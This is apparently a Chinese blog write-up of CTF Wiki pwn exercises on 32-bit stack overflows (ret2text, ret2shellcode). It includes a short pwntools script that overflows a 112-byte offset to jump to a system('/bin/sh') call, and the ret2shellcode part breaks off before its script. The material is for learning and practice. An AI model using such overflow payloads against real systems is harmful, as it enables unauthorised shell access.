CTFWiki-pwn

stackoverflow

ret2text

首先checksec一下,是32位可执行文件,没有开启保护
在这里插入图片描述
放入ida,shift+f12查看字符串,发现secure函数中使用system函数调用了"/bin/sh",记下地址0x804863a
在这里插入图片描述
查看偏移地址
在这里插入图片描述
在这里插入图片描述
脚本如下:

from pwn import *
io = process("./ret2text")
payload = b"a"*112 + p32(0x804863a)
io.sendline(payload)
io.interactive()

在这里插入图片描述

ret2shellcode

checksec一下,是32位小端序
在这里插入图片描述
IDA看一下汇编代码,发现没有shell
在这里插入图片描述
找到溢出点
在这里插入图片描述
在这里插入图片描述
buf2所在段有执行权限
在这里插入图片描述
分析偏移地址:112
在这里插入图片描述
构造脚本:


                
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值